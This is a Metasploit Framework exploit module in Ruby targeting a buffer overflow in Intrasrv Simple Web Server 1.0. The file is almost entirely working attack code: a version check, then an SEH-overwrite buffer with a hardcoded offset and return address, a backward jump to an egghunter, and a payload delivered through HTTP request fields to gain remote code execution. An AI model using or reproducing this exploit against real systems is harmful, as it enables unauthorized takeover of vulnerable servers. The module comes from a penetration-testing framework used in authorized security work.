metasploit-framework/modules/exploits/windows/http/intrasrv_bof.rb

102 lines
2.6 KiB
Ruby

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Egghunter
def initialize(info={})
super(update_info(info,
'Name' => "Intrasrv 1.0 Buffer Overflow",
'Description' => %q{
This module exploits a boundary condition error in Intrasrv Simple Web
Server 1.0. The web interface does not validate the boundaries of an
HTTP request string prior to copying the data to an insufficiently large
buffer. Successful exploitation leads to arbitrary remote code execution
in the context of the application.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xis_one@STM Solutions', #Discovery, PoC
'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit
],
'References' =>
[
['OSVDB', '94097'],
['EDB','18397'],
['BID','60229']
],
'Payload' =>
{
'StackAdjustment' => -3500,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "thread"
},
'Platform' => 'win',
'Targets' =>
[
['v1.0 - XP/2003/Win7',
{
'Offset' => 1553,
'Ret'=>0x004097dd #p/p/r - intrasrv.exe
}
]
],
'Privileged' => false,
'DisclosureDate' => "May 30 2013",
'DefaultTarget' => 0))
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => "/"
})
if res and res.headers['Server'] =~ /intrasrv 1.0/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def exploit
# setup egghunter
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true
})
# setup buffer
buf = rand_text(target['Offset']-128) # junk to egghunter
buf << make_nops(8) + hunter # nopsled + egghunter at offset-128
buf << rand_text(target['Offset']-buf.length) # more junk to offset
buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter
buf << [target.ret].pack("V*") # seh
# Setup payload
shellcode = rand_text(50) # pad payload
shellcode = egg + egg # attach egg tags
shellcode << payload.encoded
print_status("Sending buffer...")
send_request_cgi({
'method' => 'GET',
'uri' => "/",
'vhost' => buf,
'data' => shellcode
})
end
end